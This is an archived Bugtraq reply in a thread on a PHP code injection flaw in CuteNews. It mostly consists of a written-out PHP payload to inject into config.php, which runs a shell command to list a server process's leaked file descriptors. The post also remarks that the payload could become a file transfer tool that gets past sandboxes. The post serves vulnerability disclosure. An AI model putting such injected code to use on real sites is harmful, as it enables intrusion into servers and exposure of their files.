Bugtraq mailing list archives
Re: PHP code injection in CuteNews
From: Steve Grubb <linux_4ever () yahoo com>
Date: 28 Feb 2003 22:18:05 -0000
In-Reply-To: <E18ndJT-000JS2-00 () f19 mail ru> Hello, If the cutenews website is running apache 2.x which leaks descriptors to all kinds of things http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2 Then you can do this: config.php = <html><head><title>File List</title></head> <body> <?php $cmd = "/bin/ls -l /proc/$$/fd"; exec($cmd, $dir_listing, $status); foreach($dir_listing as $item) { $match = preg_split("/> /", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "<br>"; } } } ?> </body></html> it doesn't take alot more to make this a fully clickable file transfer utility that Sandboxes or Jails cannot protect. -Steve Grubb
Current thread:
- PHP code injection in CuteNews Over_G (Feb 25)
- <Possible follow-ups>
- Re: PHP code injection in CuteNews Steve Grubb (Feb 28)